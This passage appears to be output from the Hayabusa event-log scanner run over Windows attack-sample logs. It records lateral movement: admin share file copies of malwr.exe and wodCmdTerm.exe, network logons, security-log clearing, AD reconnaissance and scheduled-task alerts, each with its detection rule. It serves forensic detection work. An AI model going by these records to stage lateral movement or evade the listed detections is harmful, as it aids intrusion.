Share Path: \??\C:\ : File: Users\user04\Favorites\Links for United States : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Music : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Saved Games : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Searches : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:26.981 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: malwr.exe : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:26.981 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: malwr.exe : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:27.061 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: malwr.exe : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:27.071 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: malwr.exe : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:27.081 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: ui\SwDRM.dll : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:27.081 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: malwr.exe : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:45.488 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:45.548 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:45.548 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Default\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:47.721 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:47.721 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:56.403 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share 
Name: \\*\C$ : Share Path: \??\C:\ : File: Users : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:56.414 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\AppData : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:58.386 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:24:04.105 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:24:04.115 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:24:04.115 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Fonts\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:24:04.115 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Media\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:24:07.249 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:24:07.249 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:24:07.529 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:24:07.630 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:24:07.700 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:24:09.913 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp\setup.bat : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:24:09.913 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp\setup.bat : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:24:09.923 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:24:09.933 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:24:10.053 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: 
Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp\wodCmdTerm.exe : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:24:10.053 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:24:10.053 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp\wodCmdTerm.exe : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:24:10.053 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp\ui\SwDRM.dll : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:24:10.063 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp\wodCmdTerm.exe : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-19 07:15:36.036 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: WIN-77LTAPHIQ1R$ : Workstation: : IP Address: fe80::79bf:8ee2:433c:2567 : Port: 55585 : LogonID: 
0x10fac2,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx -2019-03-19 07:15:49.583 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: Administrator : Workstation: : IP Address: 10.0.2.17 : Port: 49244 : LogonID: 0x10fbcc,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx -2019-03-19 07:15:49.614 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: Administrator : Workstation: : IP Address: 10.0.2.17 : Port: 49249 : LogonID: 0x10fbeb,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx -2019-03-19 07:15:49.614 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: Administrator : Workstation: PC01 : IP Address: 10.0.2.17 : Port: 49249 : LogonID: 0x10fc09,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx -2019-03-19 07:15:49.692 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: user01 : Workstation: : IP Address: 10.0.2.17 : Port: 49249 : LogonID: 0x110085,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx -2019-03-19 08:23:37.147 +09:00,WIN-77LTAPHIQ1R.example.corp,1102,high,Security log was cleared,User: administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx -2019-03-19 08:23:43.570 
+09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: WIN-77LTAPHIQ1R$ : Workstation: : IP Address: fe80::79bf:8ee2:433c:2567 : Port: 55872 : LogonID: 0x15e162,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx -2019-03-19 08:23:52.491 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: user01 : Workstation: : IP Address: 10.0.2.17 : Port: 49222 : LogonID: 0x15e1a7,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx -2019-03-19 08:23:52.507 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,informational,Network Share Access,User: user01 : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx -2019-03-19 08:23:52.522 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx -2019-03-19 08:23:52.522 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx -2019-03-19 08:23:52.538 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx -2019-03-19 08:23:52.538 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Reconnaissance 
Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx -2019-03-19 08:23:57.397 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: WIN-77LTAPHIQ1R$ : Workstation: : IP Address: fe80::79bf:8ee2:433c:2567 : Port: 55873 : LogonID: 0x15e25f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx -2019-03-19 08:23:57.397 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,informational,Network Share Access,User: WIN-77LTAPHIQ1R$ : Share Name: \\*\SYSVOL : Share Path: \??\C:\Windows\SYSVOL\sysvol : IP Address: fe80::79bf:8ee2:433c:2567,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx -2019-03-19 08:24:07.601 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx -2019-03-19 08:24:07.601 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx -2019-03-19 08:24:11.413 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx -2019-03-19 08:24:11.413 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Reconnaissance 
Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx -2019-03-19 08:24:11.741 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx -2019-03-19 08:24:11.741 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx -2019-03-19 08:24:15.647 +09:00,WIN-77LTAPHIQ1R.example.corp,4776,informational,NTLM Logon to Local Account,User: Administrator : Workstation WIN-77LTAPHIQ1R : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx -2019-03-19 08:24:15.662 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx -2019-03-19 08:24:15.662 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx -2019-03-19 09:02:00.383 +09:00,WIN-77LTAPHIQ1R.example.corp,1102,high,Security log was cleared,User: administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx -2019-03-19 09:02:04.179 
+09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: ANONYMOUS LOGON : Workstation: NULL : IP Address: 10.0.2.17 : Port: 49236 : LogonID: 0x17e29a,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx -2019-03-19 09:02:04.210 +09:00,WIN-77LTAPHIQ1R.example.corp,4776,informational,NTLM Logon to Local Account,User: administrator : Workstation : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx -2019-03-19 09:02:04.210 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: Administrator : Workstation: : IP Address: 10.0.2.17 : Port: 49236 : LogonID: 0x17e2aa,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx -2019-03-19 09:02:04.210 +09:00,WIN-77LTAPHIQ1R.example.corp,4672,informational,Admin Logon,User: Administrator : LogonID: 0x17e2aa,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx -2019-03-19 09:02:04.226 +09:00,WIN-77LTAPHIQ1R.example.corp,4776,informational,NTLM Logon to Local Account,User: administrator : Workstation : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx -2019-03-19 09:02:04.226 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: Administrator : Workstation: : IP Address: 10.0.2.17 : Port: 49237 : LogonID: 
0x17e2c0,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx -2019-03-19 09:02:04.226 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,informational,Network Share Access,User: Administrator : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx -2019-03-19 09:02:04.226 +09:00,WIN-77LTAPHIQ1R.example.corp,4672,informational,Admin Logon,User: Administrator : LogonID: 0x17e2c0,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx -2019-03-19 09:02:04.257 +09:00,WIN-77LTAPHIQ1R.example.corp,4776,informational,NTLM Logon to Local Account,User: administrator : Workstation : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx -2019-03-19 09:02:04.257 +09:00,WIN-77LTAPHIQ1R.example.corp,4672,informational,Admin Logon,User: Administrator : LogonID: 0x17e2d2,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx -2019-03-19 09:02:04.319 +09:00,-,-,low,Rare Schtasks Creations,[condition] count() by TaskName < 5 in timeframe [result] count:2 TaskName:\\CYAlyNSS timeframe:7d,rules/sigma/builtin/security/win_rare_schtasks_creations.yml,- -2019-03-19 09:02:04.351 +09:00,WIN-77LTAPHIQ1R.example.corp,4699,medium,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/temp_scheduled_task_4698_4699.evtx -2019-03-19 09:02:04.351 
+09:00,WIN-77LTAPHIQ1R.example.corp,4699,medium,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx -2019-03-19 09:02:04.367 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,informational,Network Share Access,User: Administrator : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx -2019-03-19 09:02:04.398 +09:00,WIN-77LTAPHIQ1R.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: Temp\CYAlyNSS.tmp : IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx -2019-03-19 09:02:04.398 